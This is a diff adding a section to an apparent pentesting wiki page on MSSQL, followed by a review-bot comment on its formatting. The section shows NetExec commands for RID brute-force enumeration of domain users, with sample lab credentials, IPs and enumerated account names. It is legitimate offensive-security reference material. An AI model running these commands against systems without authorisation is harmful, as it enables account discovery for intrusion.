1 file changed +36 -0 lines changed
src/network-services-pentesting/pentesting-mssql-microsoft-sql-server
@@ -79,6 +79,42 @@ msf> use windows/manage/mssql_local_auth_bypass
7979
8080### [ ** Brute force** ] ( ../../generic-hacking/brute-force.md#sql-server )
8181
82+ ### ** User Enumeration via RID Brute Force**
83+
84+ You can enumerate domain users through MSSQL by brute-forcing RIDs (Relative Identifiers). This technique is useful when you have valid credentials but limited privileges:
85+ ``` bash
86+ # Using NetExec (nxc) - formerly CrackMapExec
87+ nxc mssql < IP> --local-auth -u < username> -p ' <password>' --rid-brute 5000
88+
89+ # Examples:
90+ nxc mssql 10.129.234.50 --local-auth -u sqlguest -p ' zDPBpaF4FywlqIv11vii' --rid-brute 5000
91+ nxc mssql 10.10.10.59 -u sa -p ' P@ssw0rd' --rid-brute 10000
92+
93+ # Without --local-auth for domain accounts
94+ nxc mssql 10.10.10.59 -u DOMAIN\\ user -p ' password' --rid-brute 5000
95+ ```
96+
97+ Expected output:
98+
99+ ```
100+ [snippet]
101+ MSSQL 10.129.234.50 1433 DC 1104: REDELEGATE\Christine.Flanders
102+ MSSQL 10.129.234.50 1433 DC 1105: REDELEGATE\Marie.Curie
103+ MSSQL 10.129.234.50 1433 DC 1106: REDELEGATE\Helen.Frost
104+ MSSQL 10.129.234.50 1433 DC 1107: REDELEGATE\Michael.Pontiac
105+ MSSQL 10.129.234.50 1433 DC 1108: REDELEGATE\Mallory.Roberts
106+ MSSQL 10.129.234.50 1433 DC 1109: REDELEGATE\James.Dinkleberg
107+ [snippet]
108+ ```
109+
110+ ** Parameters:**
111+ - ` --local-auth ` : Use local authentication instead of domain
112+ - ` --rid-brute <max_rid> ` : Brute force RIDs up to the specified number (default: 4000)
113+ - ` -u ` : Username
114+ - ` -p ` : Password
115+
116+ This technique will enumerate users by querying the MSSQL server for account information associated with sequential RIDs.
117+
82118### Manual Enumeration
83119
84120#### Login
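Review bot: the example `nxc mssql 10.10.10.59 -u sa -p ' P@ssw0rd' --rid-brute 10000` omits `--local-auth`, yet `sa` is a SQL Server login rather than a Windows account, so as written nxc would attempt Windows authentication with that name; add `--local-auth` to that line or move it under the `--local-auth` examples, leaving the `DOMAIN\\user` line as the only one without the flag, as its comment intends. The rendered block also carries stray spaces inside the quotes and placeholders (`' <password>'`, `' zDPBpaF4FywlqIv11vii'`, `< IP>`, `DOMAIN\\ user`), which would be passed literally to nxc if copied, and the parameter list pads each flag with spaces inside the backticks; the heading `### ** User Enumeration via RID Brute Force**` likewise has a space after the opening `**`, which breaks the bold markup. Tighten these, give the fence a language tag without the leading space (the first block is opened as "``` bash", the expected-output block has no tag), and consider replacing the lab credentials and IPs in the examples with placeholders, since the first line of the block already shows the generic form.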